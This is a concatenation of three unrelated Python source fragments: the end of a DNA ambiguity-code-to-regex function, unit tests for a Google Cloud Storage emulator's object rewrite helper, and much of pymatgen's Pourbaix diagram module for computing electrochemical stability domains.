'?' and '-' are translated into [ACGT].
@param sequence: A C{str} DNA sequence, possibly with ambiguous codes.
Case insensitive.
@param wildcards: A C{set} (or C{str}) with characters that should be
translated to '[ACGT]'. Note that this happens only if the standard
ambiguous lookup fails (the order could be changed one day if we need
to override, or we could allow the passing of an ambiguity mapping).
Wildcards are case sensitive.
@raise KeyError: If any character in C{sequence} is unknown.
@return: A C{str} regular expression with [...] for the ambiguous codes in
C{sequence}.
"""
result = []
append = result.append
for base in sequence.upper():
try:
possible = ''.join(sorted(AMBIGUOUS[base]))
except KeyError:
if base in wildcards:
possible = 'ACGT'
else:
raise
append(('[%s]' % possible) if len(possible) > 1 else possible)
return ''.join(result)
| |
#!/usr/bin/env python3
#
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for the Rewrite helper (see gcs/rewrite.py)."""
import unittest
import unittest.mock
import grpc
from werkzeug.test import create_environ
from werkzeug.wrappers import Request
import gcs
from google.storage.v2 import storage_pb2
class TestRewrite(unittest.TestCase):
MIN_REWRITE_BYTES = 1024 * 1024
def test_rewrite_rest(self):
environ = create_environ(
base_url="http://localhost:8080",
query_string={},
)
rewrite = gcs.rewrite.Rewrite.init_rest(
Request(environ),
"source-bucket",
"source-object",
"destination-bucket",
"destination-object",
)
self.assertEqual("source-bucket", rewrite.src_bucket_name)
self.assertEqual("source-object", rewrite.src_object_name)
self.assertEqual("destination-bucket", rewrite.dst_bucket_name)
self.assertEqual("destination-object", rewrite.dst_object_name)
self.assertEqual(
TestRewrite.MIN_REWRITE_BYTES, rewrite.max_bytes_rewritten_per_call
)
def test_rewrite_rest_with_low_bytes(self):
environ = create_environ(
base_url="http://localhost:8080",
query_string={
"maxBytesRewrittenPerCall": int(TestRewrite.MIN_REWRITE_BYTES / 2)
},
)
rewrite = gcs.rewrite.Rewrite.init_rest(
Request(environ),
"source-bucket",
"source-object",
"destination-bucket",
"destination-object",
)
self.assertEqual(
TestRewrite.MIN_REWRITE_BYTES, rewrite.max_bytes_rewritten_per_call
)
def test_rewrite_rest_with_high_bytes(self):
environ = create_environ(
base_url="http://localhost:8080",
query_string={
"maxBytesRewrittenPerCall": TestRewrite.MIN_REWRITE_BYTES * 2
},
)
rewrite = gcs.rewrite.Rewrite.init_rest(
Request(environ),
"source-bucket",
"source-object",
"destination-bucket",
"destination-object",
)
self.assertEqual(
2 * TestRewrite.MIN_REWRITE_BYTES, rewrite.max_bytes_rewritten_per_call
)
def test_rewrite_grpc(self):
request = storage_pb2.RewriteObjectRequest(
destination_bucket="projects/_/buckets/destination-bucket",
destination_name="destination-object",
destination=storage_pb2.Object(
metadata={"key": "value"},
),
source_bucket="projects/_/buckets/source-bucket",
source_object="source-object",
)
context = unittest.mock.Mock()
rewrite = gcs.rewrite.Rewrite.init_grpc(request, context)
self.assertEqual("source-bucket", rewrite.src_bucket_name)
self.assertEqual("source-object", rewrite.src_object_name)
self.assertEqual("destination-bucket", rewrite.dst_bucket_name)
self.assertEqual("destination-object", rewrite.dst_object_name)
self.assertEqual(
TestRewrite.MIN_REWRITE_BYTES, rewrite.max_bytes_rewritten_per_call
)
def test_rewrite_grpc_no_destination_object(self):
request = storage_pb2.RewriteObjectRequest(
destination_bucket="projects/_/buckets/destination-bucket",
destination_name="destination-object",
source_bucket="projects/_/buckets/source-bucket",
source_object="source-object",
)
context = unittest.mock.Mock()
rewrite = gcs.rewrite.Rewrite.init_grpc(request, context)
self.assertEqual("source-bucket", rewrite.src_bucket_name)
self.assertEqual("source-object", rewrite.src_object_name)
self.assertEqual("destination-bucket", rewrite.dst_bucket_name)
self.assertEqual("destination-object", rewrite.dst_object_name)
self.assertEqual(
TestRewrite.MIN_REWRITE_BYTES, rewrite.max_bytes_rewritten_per_call
)
def test_rewrite_grpc_low_bytes(self):
request = storage_pb2.RewriteObjectRequest(
destination_bucket="projects/_/buckets/destination-bucket",
destination_name="destination-object",
source_bucket="projects/_/buckets/source-bucket",
source_object="source-object",
max_bytes_rewritten_per_call=int(TestRewrite.MIN_REWRITE_BYTES / 2),
)
context = unittest.mock.Mock()
rewrite = gcs.rewrite.Rewrite.init_grpc(request, context)
self.assertEqual(
TestRewrite.MIN_REWRITE_BYTES, rewrite.max_bytes_rewritten_per_call
)
def test_rewrite_grpc_high_bytes(self):
request = storage_pb2.RewriteObjectRequest(
destination_bucket="projects/_/buckets/destination-bucket",
destination_name="destination-object",
source_bucket="projects/_/buckets/source-bucket",
source_object="source-object",
max_bytes_rewritten_per_call=int(2 * TestRewrite.MIN_REWRITE_BYTES),
)
context = unittest.mock.Mock()
rewrite = gcs.rewrite.Rewrite.init_grpc(request, context)
self.assertEqual(
2 * TestRewrite.MIN_REWRITE_BYTES, rewrite.max_bytes_rewritten_per_call
)
def test_rewrite_bad_requests(self):
cases = {
"missing destination": storage_pb2.RewriteObjectRequest(
source_bucket="projects/_/buckets/source-bucket",
source_object="source-object",
),
"bad destination.bucket [1]": storage_pb2.RewriteObjectRequest(
destination_bucket="destination-bucket",
destination_name="destination-object",
source_bucket="projects/_/buckets/source-bucket",
source_object="source-object",
),
"bad destination.bucket [2]": storage_pb2.RewriteObjectRequest(
destination_bucket="projects/_/buckets/",
destination_name="destination-object",
source_bucket="projects/_/buckets/source-bucket",
source_object="source-object",
),
"missing destination.name": storage_pb2.RewriteObjectRequest(
destination_bucket="projects/_/buckets/destination-bucket",
source_bucket="projects/_/buckets/source-bucket",
source_object="source-object",
),
"bad source bucket [1]": storage_pb2.RewriteObjectRequest(
destination_bucket="projects/_/buckets/destination-bucket",
destination_name="destination-object",
source_bucket="source-bucket",
source_object="source-object",
),
"bad source_bucket [2]": storage_pb2.RewriteObjectRequest(
destination_bucket="projects/_/buckets/destination-bucket",
destination_name="destination-object",
source_bucket="projects/_/buckets/",
source_object="source-object",
),
"missing source_object": storage_pb2.RewriteObjectRequest(
destination_bucket="projects/_/buckets/destination-bucket",
destination_name="destination-object",
source_bucket="projects/_/buckets/source-bucket",
),
"inconsistent object name": storage_pb2.RewriteObjectRequest(
destination_bucket="projects/_/buckets/destination-bucket",
destination_name="destination-object",
destination=storage_pb2.Object(
name="inconsistent-object-name",
),
source_bucket="projects/_/buckets/source-bucket",
source_object="source-object",
),
"inconsistent bucket name": storage_pb2.RewriteObjectRequest(
destination_bucket="projects/_/buckets/destination-bucket",
destination_name="destination-object",
destination=storage_pb2.Object(
bucket="inconsistent-bucket-name",
),
source_bucket="projects/_/buckets/source-bucket",
source_object="source-object",
),
}
for case, request in cases.items():
context = unittest.mock.Mock(name=case)
rewrite = gcs.rewrite.Rewrite.init_grpc(request, context)
self.assertIsNone(rewrite, msg=case)
context.abort.assert_called_once_with(
grpc.StatusCode.INVALID_ARGUMENT, unittest.mock.ANY
)
if __name__ == "__main__":
unittest.main()
| |
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
"""
This module is intended to be used to compute Pourbaix diagrams
of arbitrary compositions and formation energies. If you use
this module in your work, please consider citing the following:
General formalism for solid-aqueous equilibria from DFT:
Persson et al., DOI: 10.1103/PhysRevB.85.235438
Decomposition maps, or Pourbaix hull diagrams
Singh et al., DOI: 10.1021/acs.chemmater.7b03980
Fast computation of many-element Pourbaix diagrams:
Patel et al., https://arxiv.org/abs/1909.00035 (submitted)
"""
import itertools
import logging
import re
import warnings
from copy import deepcopy
from functools import cmp_to_key, lru_cache, partial
from multiprocessing import Pool
from typing import Optional, Union, List, Dict
import numpy as np
from monty.json import MontyDecoder, MSONable
from scipy.spatial import ConvexHull, HalfspaceIntersection
try:
from scipy.special import comb
except ImportError:
from scipy.misc import comb
from pymatgen.analysis.phase_diagram import PDEntry, PhaseDiagram
from pymatgen.analysis.reaction_calculator import Reaction, ReactionError
from pymatgen.core.composition import Composition
from pymatgen.core.ion import Ion
from pymatgen.core.periodic_table import Element
from pymatgen.entries.compatibility import MU_H2O
from pymatgen.entries.computed_entries import ComputedEntry
from pymatgen.util.coord import Simplex
from pymatgen.util.plotting import pretty_plot
from pymatgen.util.string import Stringify
__author__ = "Sai Jayaraman"
__copyright__ = "Copyright 2012, The Materials Project"
__version__ = "0.4"
__maintainer__ = "Joseph Montoya"
__credits__ = "Arunima Singh, Joseph Montoya, Anjli Patel"
__email__ = "joseph.montoya@tri.global"
__status__ = "Production"
__date__ = "Nov 1, 2012"
logger = logging.getLogger(__name__)
PREFAC = 0.0591
# TODO: Revise to more closely reflect PDEntry, invoke from energy/composition
# TODO: PourbaixEntries depend implicitly on having entry energies be
# formation energies, should be a better way to get from raw energies
# TODO: uncorrected_energy is a bit of a misnomer, but not sure what to rename
class PourbaixEntry(MSONable, Stringify):
"""
An object encompassing all data relevant to a solid or ion
in a pourbaix diagram. Each bulk solid/ion has an energy
g of the form: e = e0 + 0.0591 log10(conc) - nO mu_H2O
+ (nH - 2nO) pH + phi (-nH + 2nO + q)
Note that the energies corresponding to the input entries
should be formation energies with respect to hydrogen and
oxygen gas in order for the pourbaix diagram formalism to
work. This may be changed to be more flexible in the future.
"""
def __init__(self, entry, entry_id=None, concentration=1e-6):
"""
Args:
entry (ComputedEntry/ComputedStructureEntry/PDEntry/IonEntry): An
entry object
entry_id ():
concentration ():
"""
self.entry = entry
if isinstance(entry, IonEntry):
self.concentration = concentration
self.phase_type = "Ion"
self.charge = entry.ion.charge
else:
self.concentration = 1.0
self.phase_type = "Solid"
self.charge = 0.0
self.uncorrected_energy = entry.energy
if entry_id is not None:
self.entry_id = entry_id
elif hasattr(entry, "entry_id") and entry.entry_id:
self.entry_id = entry.entry_id
else:
self.entry_id = None
@property
def npH(self):
"""
Returns:
"""
return self.entry.composition.get("H", 0.0) - 2 * self.entry.composition.get("O", 0.0)
@property
def nH2O(self):
"""
Returns: Number of H2O.
"""
return self.entry.composition.get("O", 0.0)
@property
def nPhi(self):
"""
Returns: Number of H2O.
"""
return self.npH - self.charge
@property
def name(self):
"""
Returns: Name for entry
"""
if self.phase_type == "Solid":
return self.entry.composition.reduced_formula + "(s)"
return self.entry.name
@property
def energy(self):
"""
returns energy
Returns (float): total energy of the pourbaix
entry (at pH, V = 0 vs. SHE)
"""
# Note: this implicitly depends on formation energies as input
return self.uncorrected_energy + self.conc_term - (MU_H2O * self.nH2O)
@property
def energy_per_atom(self):
"""
energy per atom of the pourbaix entry
Returns (float): energy per atom
"""
return self.energy / self.composition.num_atoms
def energy_at_conditions(self, pH, V):
"""
Get free energy for a given pH and V
Args:
pH (float): pH at which to evaluate free energy
V (float): voltage at which to evaluate free energy
Returns:
free energy at conditions
"""
return self.energy + self.npH * PREFAC * pH + self.nPhi * V
def get_element_fraction(self, element):
"""
Gets the elemental fraction of a given non-OH element
Args:
element (Element or str): string or element corresponding
to element to get from composition
Returns:
fraction of element / sum(all non-OH elements)
"""
return self.composition.get(element) * self.normalization_factor
@property
def normalized_energy(self):
"""
Returns:
energy normalized by number of non H or O atoms, e. g.
for Zn2O6, energy / 2 or for AgTe3(OH)3, energy / 4
"""
return self.energy * self.normalization_factor
def normalized_energy_at_conditions(self, pH, V):
"""
Energy at an electrochemical condition, compatible with
numpy arrays for pH/V input
Args:
pH (float): pH at condition
V (float): applied potential at condition
Returns:
energy normalized by number of non-O/H atoms at condition
"""
return self.energy_at_conditions(pH, V) * self.normalization_factor
@property
def conc_term(self):
"""
Returns the concentration contribution to the free energy,
and should only be present when there are ions in the entry
"""
return PREFAC * np.log10(self.concentration)
# TODO: not sure if these are strictly necessary with refactor
def as_dict(self):
"""
Returns dict which contains Pourbaix Entry data.
Note that the pH, voltage, H2O factors are always calculated when
constructing a PourbaixEntry object.
"""
d = {"@module": self.__class__.__module__, "@class": self.__class__.__name__}
if isinstance(self.entry, IonEntry):
d["entry_type"] = "Ion"
else:
d["entry_type"] = "Solid"
d["entry"] = self.entry.as_dict()
d["concentration"] = self.concentration
d["entry_id"] = self.entry_id
return d
@classmethod
def from_dict(cls, d):
"""
Invokes a PourbaixEntry from a dictionary
"""
entry_type = d["entry_type"]
if entry_type == "Ion":
entry = IonEntry.from_dict(d["entry"])
else:
entry = MontyDecoder().process_decoded(d["entry"])
entry_id = d["entry_id"]
concentration = d["concentration"]
return PourbaixEntry(entry, entry_id, concentration)
@property
def normalization_factor(self):
"""
Sum of number of atoms minus the number of H and O in composition
"""
return 1.0 / (self.num_atoms - self.composition.get("H", 0) - self.composition.get("O", 0))
@property
def composition(self):
"""
Returns composition
"""
return self.entry.composition
@property
def num_atoms(self):
"""
Return number of atoms in current formula. Useful for normalization
"""
return self.composition.num_atoms
def to_pretty_string(self) -> str:
"""
:return: A pretty string representation.
"""
if self.phase_type == "Solid":
return self.entry.composition.reduced_formula + "(s)"
return self.entry.name
def __repr__(self):
return "Pourbaix Entry : {} with energy = {:.4f}, npH = {}, nPhi = {}, nH2O = {}, entry_id = {} ".format(
self.entry.composition,
self.energy,
self.npH,
self.nPhi,
self.nH2O,
self.entry_id,
)
def __str__(self):
return self.__repr__()
class MultiEntry(PourbaixEntry):
"""
PourbaixEntry-like object for constructing multi-elemental Pourbaix
diagrams.
"""
def __init__(self, entry_list, weights=None):
"""
Initializes a MultiEntry.
Args:
entry_list ([PourbaixEntry]): List of component PourbaixEntries
weights ([float]): Weights associated with each entry. Default is None
"""
if weights is None:
self.weights = [1.0] * len(entry_list)
else:
self.weights = weights
self.entry_list = entry_list
@lru_cache()
def __getattr__(self, item):
"""
Because most of the attributes here are just weighted
averages of the entry_list, we save some space by
having a set of conditionals to define the attributes
"""
# Attributes that are weighted averages of entry attributes
if item in [
"energy",
"npH",
"nH2O",
"nPhi",
"conc_term",
"composition",
"uncorrected_energy",
]:
# TODO: Composition could be changed for compat with sum
if item == "composition":
start = Composition({})
else:
start = 0
return sum(
(getattr(e, item) * w for e, w in zip(self.entry_list, self.weights)),
start,
)
# Attributes that are just lists of entry attributes
if item in ["entry_id", "phase_type"]:
return [getattr(e, item) for e in self.entry_list]
# normalization_factor, num_atoms should work from superclass
return self.__getattribute__(item)
@property
def name(self):
"""
MultiEntry name, i. e. the name of each entry joined by ' + '
"""
return " + ".join([e.name for e in self.entry_list])
def __repr__(self):
return (
"Multiple Pourbaix Entry: energy = {:.4f}, npH = {}, nPhi = {}, "
"nH2O = {}, entry_id = {}, species: {}".format(
self.energy, self.npH, self.nPhi, self.nH2O, self.entry_id, self.name
)
)
def __str__(self):
return self.__repr__()
def as_dict(self):
"""
Returns: MSONable dict
"""
return {
"@module": self.__class__.__module__,
"@class": self.__class__.__name__,
"entry_list": [e.as_dict() for e in self.entry_list],
"weights": self.weights,
}
@classmethod
def from_dict(cls, d):
"""
Args:
d (): Dict representation
Returns:
MultiEntry
"""
entry_list = [PourbaixEntry.from_dict(e) for e in d.get("entry_list")]
return cls(entry_list, d.get("weights"))
# TODO: this class isn't particularly useful in its current form, could be
# refactored to include information about the reference solid
class IonEntry(PDEntry):
"""
Object similar to PDEntry, but contains an Ion object instead of a
Composition object.
.. attribute:: name
A name for the entry. This is the string shown in the phase diagrams.
By default, this is the reduced formula for the composition, but can be
set to some other string for display purposes.
"""
def __init__(self, ion, energy, name=None, attribute=None):
"""
Args:
ion: Ion object
energy: Energy for composition.
name: Optional parameter to name the entry. Defaults to the
chemical formula.
"""
self.ion = ion
# Auto-assign name
name = name if name else self.ion.reduced_formula
super().__init__(composition=ion.composition, energy=energy, name=name, attribute=attribute)
@classmethod
def from_dict(cls, d):
"""
Returns an IonEntry object from a dict.
"""
return IonEntry(Ion.from_dict(d["ion"]), d["energy"], d.get("name"), d.get("attribute"))
def as_dict(self):
"""
Creates a dict of composition, energy, and ion name
"""
d = {"ion": self.ion.as_dict(), "energy": self.energy, "name": self.name}
return d
def __repr__(self):
return f"IonEntry : {self.composition} with energy = {self.energy:.4f}"
def __str__(self):
return self.__repr__()
def ion_or_solid_comp_object(formula):
"""
Returns either an ion object or composition object given
a formula.
Args:
formula: String formula. Eg. of ion: NaOH(aq), Na[+];
Eg. of solid: Fe2O3(s), Fe(s), Na2O
Returns:
Composition/Ion object
"""
m = re.search(r"\[([^\[\]]+)\]|\(aq\)", formula)
if m:
comp_obj = Ion.from_formula(formula)
elif re.search(r"\(s\)", formula):
comp_obj = Composition(formula[:-3])
else:
comp_obj = Composition(formula)
return comp_obj
ELEMENTS_HO = {Element("H"), Element("O")}
# TODO: the solids filter breaks some of the functionality of the
# heatmap plotter, because the reference states for decomposition
# don't include oxygen/hydrogen in the OER/HER regions
# TODO: create a from_phase_diagram class method for non-formation energy
# invocation
# TODO: invocation from a MultiEntry entry list could be a bit more robust
# TODO: serialization is still a bit rough around the edges
class PourbaixDiagram(MSONable):
"""
Class to create a Pourbaix diagram from entries
"""
def __init__(
self,
entries: Union[List[PourbaixEntry], List[MultiEntry]],
comp_dict: Optional[Dict[str, float]] = None,
conc_dict: Optional[Dict[str, float]] = None,
filter_solids: bool = True,
nproc: Optional[int] = None,
):
"""
Args:
entries ([PourbaixEntry] or [MultiEntry]): Entries list
containing Solids and Ions or a list of MultiEntries
comp_dict ({str: float}): Dictionary of compositions,
defaults to equal parts of each elements
conc_dict ({str: float}): Dictionary of ion concentrations,
defaults to 1e-6 for each element
filter_solids (bool): applying this filter to a Pourbaix
diagram ensures all included solid phases are filtered by
stability on the compositional phase diagram. Defaults to True.
The practical consequence of this is that highly oxidized or reduced
phases that might show up in experiments due to kinetic limitations
on oxygen/hydrogen evolution won't appear in the diagram, but they are
not actually "stable" (and are frequently overstabilized from DFT errors).
Hence, including only the stable solid phases generally leads to the
most accurate Pourbaix diagrams.
nproc (int): number of processes to generate multientries with
in parallel. Defaults to None (serial processing)
"""
entries = deepcopy(entries)
self.filter_solids = filter_solids
# Get non-OH elements
self.pbx_elts = list(
set(itertools.chain.from_iterable([entry.composition.elements for entry in entries])) - ELEMENTS_HO
)
self.dim = len(self.pbx_elts) - 1
# Process multientry inputs
if isinstance(entries[0], MultiEntry):
self._processed_entries = entries
# Extract individual entries
single_entries = list(set(itertools.chain.from_iterable([e.entry_list for e in entries])))
self._unprocessed_entries = single_entries
self._filtered_entries = single_entries
self._conc_dict = None
self._elt_comp = {k: v for k, v in entries[0].composition.items() if k not in ELEMENTS_HO}
self._multielement = True
# Process single entry inputs
else:
# Set default conc/comp dicts
if not comp_dict:
comp_dict = {elt.symbol: 1.0 / len(self.pbx_elts) for elt in self.pbx_elts}
if not conc_dict:
conc_dict = {elt.symbol: 1e-6 for elt in self.pbx_elts}
self._conc_dict = conc_dict
self._elt_comp = comp_dict
self.pourbaix_elements = self.pbx_elts
solid_entries = [entry for entry in entries if entry.phase_type == "Solid"]
ion_entries = [entry for entry in entries if entry.phase_type == "Ion"]
# If a conc_dict is specified, override individual entry concentrations
for entry in ion_entries:
ion_elts = list(set(entry.composition.elements) - ELEMENTS_HO)
# TODO: the logic here for ion concentration setting is in two
# places, in PourbaixEntry and here, should be consolidated
if len(ion_elts) == 1:
entry.concentration = conc_dict[ion_elts[0].symbol] * entry.normalization_factor
elif len(ion_elts) > 1 and not entry.concentration:
raise ValueError("Elemental concentration not compatible with multi-element ions")
self._unprocessed_entries = solid_entries + ion_entries
if not len(solid_entries + ion_entries) == len(entries):
raise ValueError("All supplied entries must have a phase type of " 'either "Solid" or "Ion"')
if self.filter_solids:
# O is 2.46 b/c pbx entry finds energies referenced to H2O
entries_HO = [ComputedEntry("H", 0), ComputedEntry("O", 2.46)]
solid_pd = PhaseDiagram(solid_entries + entries_HO)
solid_entries = list(set(solid_pd.stable_entries) - set(entries_HO))
self._filtered_entries = solid_entries + ion_entries
if len(comp_dict) > 1:
self._multielement = True
self._processed_entries = self._preprocess_pourbaix_entries(self._filtered_entries, nproc=nproc)
else:
self._processed_entries = self._filtered_entries
self._multielement = False
self._stable_domains, self._stable_domain_vertices = self.get_pourbaix_domains(self._processed_entries)
def _convert_entries_to_points(self, pourbaix_entries):
"""
Args:
pourbaix_entries ([PourbaixEntry]): list of pourbaix entries
to process into vectors in nph-nphi-composition space
Returns:
list of vectors, [[nph, nphi, e0, x1, x2, ..., xn-1]]
corresponding to each entry in nph-nphi-composition space
"""
vecs = [
[entry.npH, entry.nPhi, entry.energy] + [entry.composition.get(elt) for elt in self.pbx_elts[:-1]]
for entry in pourbaix_entries
]
vecs = np.array(vecs)
norms = np.transpose([[entry.normalization_factor for entry in pourbaix_entries]])
vecs *= norms
return vecs
def _get_hull_in_nph_nphi_space(self, entries):
"""
Generates convex hull of pourbaix diagram entries in composition,
npH, and nphi space. This enables filtering of multi-entries
such that only compositionally stable combinations of entries
are included.
Args:
entries ([PourbaixEntry]): list of PourbaixEntries to construct
the convex hull
Returns: list of entries and stable facets corresponding to that
list of entries
"""
ion_entries = [entry for entry in entries if entry.phase_type == "Ion"]
solid_entries = [entry for entry in entries if entry.phase_type == "Solid"]
# Pre-filter solids based on min at each composition
logger.debug("Pre-filtering solids by min energy at each composition")
sorted_entries = sorted(
solid_entries,
key=lambda x: (x.composition.reduced_composition, x.entry.energy_per_atom),
)
grouped_by_composition = itertools.groupby(sorted_entries, key=lambda x: x.composition.reduced_composition)
min_entries = [list(grouped_entries)[0] for comp, grouped_entries in grouped_by_composition]
min_entries += ion_entries
logger.debug("Constructing nph-nphi-composition points for qhull")
vecs = self._convert_entries_to_points(min_entries)
maxes = np.max(vecs[:, :3], axis=0)
extra_point = np.concatenate([maxes, np.ones(self.dim) / self.dim], axis=0)
# Add padding for extra point
pad = 1000
extra_point[2] += pad
points = np.concatenate([vecs, np.array([extra_point])], axis=0)
logger.debug("Constructing convex hull in nph-nphi-composition space")
hull = ConvexHull(points, qhull_options="QJ i")
# Create facets and remove top
facets = [facet for facet in hull.simplices if not len(points) - 1 in facet]
if self.dim > 1:
logger.debug("Filtering facets by pourbaix composition")
valid_facets = []
for facet in facets:
comps = vecs[facet][:, 3:]
full_comps = np.concatenate([comps, 1 - np.sum(comps, axis=1).reshape(len(comps), 1)], axis=1)
# Ensure an compositional interior point exists in the simplex
if np.linalg.matrix_rank(full_comps) > self.dim:
valid_facets.append(facet)
else:
valid_facets = facets
return min_entries, valid_facets
def _preprocess_pourbaix_entries(self, entries, nproc=None):
"""
Generates multi-entries for pourbaix diagram
Args:
entries ([PourbaixEntry]): list of PourbaixEntries to preprocess
into MultiEntries
nproc (int): number of processes to be used in parallel
treatment of entry combos
Returns:
([MultiEntry]) list of stable MultiEntry candidates
"""
# Get composition
tot_comp = Composition(self._elt_comp)
min_entries, valid_facets = self._get_hull_in_nph_nphi_space(entries)
combos = []
for facet in valid_facets:
for i in range(1, self.dim + 2):
these_combos = []
for combo in itertools.combinations(facet, i):
these_entries = [min_entries[i] for i in combo]
these_combos.append(frozenset(these_entries))
combos.append(these_combos)
all_combos = set(itertools.chain.from_iterable(combos))
list_combos = []
for i in all_combos:
list_combos.append(list(i))
all_combos = list_combos
multi_entries = []
# Parallel processing of multi-entry generation
if nproc is not None:
f = partial(self.process_multientry, prod_comp=tot_comp)
with Pool(nproc) as p:
multi_entries = list(p.imap(f, all_combos))
multi_entries = list(filter(bool, multi_entries))
else:
# Serial processing of multi-entry generation
for combo in all_combos:
multi_entry = self.process_multientry(combo, prod_comp=tot_comp)
if multi_entry:
multi_entries.append(multi_entry)
return multi_entries
def _generate_multielement_entries(self, entries, nproc=None):
"""
Create entries for multi-element Pourbaix construction.
This works by finding all possible linear combinations
of entries that can result in the specified composition
from the initialized comp_dict.
Args:
entries ([PourbaixEntries]): list of pourbaix entries
to process into MultiEntries
nproc (int): number of processes to be used in parallel
treatment of entry combos
"""
N = len(self._elt_comp) # No. of elements
total_comp = Composition(self._elt_comp)
# generate all combinations of compounds that have all elements
entry_combos = [itertools.combinations(entries, j + 1) for j in range(N)]
entry_combos = itertools.chain.from_iterable(entry_combos)
entry_combos = filter(lambda x: total_comp < MultiEntry(x).composition, entry_combos)
# Generate and filter entries
processed_entries = []
total = sum(comb(len(entries), j + 1) for j in range(N))
if total > 1e6:
warnings.warn(f"Your pourbaix diagram includes {total} entries and may take a long time to generate.")
# Parallel processing of multi-entry generation
if nproc is not None:
f = partial(self.process_multientry, prod_comp=total_comp)
with Pool(nproc) as p:
processed_entries = list(p.imap(f, entry_combos))
processed_entries = list(filter(bool, processed_entries))
# Serial processing of multi-entry generation
else:
for entry_combo in entry_combos:
processed_entry = self.process_multientry(entry_combo, total_comp)
if processed_entry is not None:
processed_entries.append(processed_entry)
return processed_entries
@staticmethod
def process_multientry(entry_list, prod_comp, coeff_threshold=1e-4):
"""
Static method for finding a multientry based on
a list of entries and a product composition.
Essentially checks to see if a valid aqueous
reaction exists between the entries and the
product composition and returns a MultiEntry
with weights according to the coefficients if so.
Args:
entry_list ([Entry]): list of entries from which to
create a MultiEntry
prod_comp (Composition): composition constraint for setting
weights of MultiEntry
coeff_threshold (float): threshold of stoichiometric
coefficients to filter, if weights are lower than
this value, the entry is not returned
"""
dummy_oh = [Composition("H"), Composition("O")]
try:
# Get balanced reaction coeffs, ensuring all < 0 or conc thresh
# Note that we get reduced compositions for solids and non-reduced
# compositions for ions because ions aren't normalized due to
# their charge state.
entry_comps = [e.composition for e in entry_list]
rxn = Reaction(entry_comps + dummy_oh, [prod_comp])
react_coeffs = [-rxn.get_coeff(comp) for comp in entry_comps]
all_coeffs = react_coeffs + [rxn.get_coeff(prod_comp)]
# Check if reaction coeff threshold met for pourbaix compounds
# All reactant/product coefficients must be positive nonzero
if all(coeff > coeff_threshold for coeff in all_coeffs):
return MultiEntry(entry_list, weights=react_coeffs)
return None
except ReactionError:
return None
@staticmethod
def get_pourbaix_domains(pourbaix_entries, limits=None):
"""
Returns a set of pourbaix stable domains (i. e. polygons) in
pH-V space from a list of pourbaix_entries
This function works by using scipy's HalfspaceIntersection
function to construct all of the 2-D polygons that form the
boundaries of the planes corresponding to individual entry
gibbs free energies as a function of pH and V. Hyperplanes
of the form a*pH + b*V + 1 - g(0, 0) are constructed and
supplied to HalfspaceIntersection, which then finds the
boundaries of each pourbaix region using the intersection
points.
Args:
pourbaix_entries ([PourbaixEntry]): Pourbaix entries
with which to construct stable pourbaix domains
limits ([[float]]): limits in which to do the pourbaix
analysis
Returns:
Returns a dict of the form {entry: [boundary_points]}.
The list of boundary points are the sides of the N-1
dim polytope bounding the allowable ph-V range of each entry.
"""
if limits is None:
limits = [[-2, 16], [-4, 4]]
# Get hyperplanes
hyperplanes = [
np.array([-PREFAC * entry.npH, -entry.nPhi, 0, -entry.energy]) * entry.normalization_factor
for entry in pourbaix_entries
]
hyperplanes = np.array(hyperplanes)
hyperplanes[:, 2] = 1
max_contribs = np.max(np.abs(hyperplanes), axis=0)
g_max = np.dot(-max_contribs, [limits[0][1], limits[1][1], 0, 1])
# Add border hyperplanes and generate HalfspaceIntersection
border_hyperplanes = [
[-1, 0, 0, limits[0][0]],
[1, 0, 0, -limits[0][1]],
[0, -1, 0, limits[1][0]],
[0, 1, 0, -limits[1][1]],
[0, 0, -1, 2 * g_max],
]
hs_hyperplanes = np.vstack([hyperplanes, border_hyperplanes])
interior_point = np.average(limits, axis=1).tolist() + [g_max]
hs_int = HalfspaceIntersection(hs_hyperplanes, np.array(interior_point))
# organize the boundary points by entry
pourbaix_domains = {entry: [] for entry in pourbaix_entries}
for intersection, facet in zip(hs_int.intersections, hs_int.dual_facets):
for v in facet:
if v < len(pourbaix_entries):
this_entry = pourbaix_entries[v]
pourbaix_domains[this_entry].append(intersection)
# Remove entries with no pourbaix region
pourbaix_domains = {k: v for k, v in pourbaix_domains.items() if v}
pourbaix_domain_vertices = {}
for entry, points in pourbaix_domains.items():
points = np.array(points)[:, :2]
# Initial sort to ensure consistency
points = points[np.lexsort(np.transpose(points))]
center = np.average(points, axis=0)
points_centered = points - center
# Sort points by cross product of centered points,
# isn't strictly necessary but useful for plotting tools
points_centered = sorted(points_centered, key=cmp_to_key(lambda x, y: x[0] * y[1] - x[1] * y[0]))
points = points_centered + center
# Create simplices corresponding to pourbaix boundary
simplices = [Simplex(points[indices]) for indices in ConvexHull(points).simplices]
pourbaix_domains[entry] = simplices
pourbaix_domain_vertices[entry] = points
return pourbaix_domains, pourbaix_domain_vertices
def find_stable_entry(self, pH, V):
"""
Finds stable entry at a pH,V condition
Args:
pH (float): pH to find stable entry
V (float): V to find stable entry
Returns:
"""
energies_at_conditions = [e.normalized_energy_at_conditions(pH, V) for e in self.stable_entries]
return self.stable_entries[np.argmin(energies_at_conditions)]
def get_decomposition_energy(self, entry, pH, V):
"""
Finds decomposition to most stable entries in eV/atom,
supports vectorized inputs for pH and V
Args:
entry (PourbaixEntry): PourbaixEntry corresponding to
compound to find the decomposition for
pH (float, [float]): pH at which to find the decomposition
V (float, [float]): voltage at which to find the decomposition
Returns:
Decomposition energy for the entry, i. e. the energy above
the "pourbaix hull" in eV/atom at the given conditions
"""
# Check composition consistency between entry and Pourbaix diagram:
pbx_comp = Composition(self._elt_comp).fractional_composition
entry_pbx_comp = Composition(
{elt: coeff for elt, coeff in entry.composition.items() if elt not in ELEMENTS_HO}
).fractional_composition
if entry_pbx_comp != pbx_comp:
raise ValueError("Composition of stability entry does not match Pourbaix Diagram")
entry_normalized_energy = entry.normalized_energy_at_conditions(pH, V)
hull_energy = self.get_hull_energy(pH, V)
decomposition_energy = entry_normalized_energy - hull_energy
# Convert to eV/atom instead of eV/normalized formula unit
decomposition_energy /= entry.normalization_factor
decomposition_energy /= entry.composition.num_atoms
return decomposition_energy
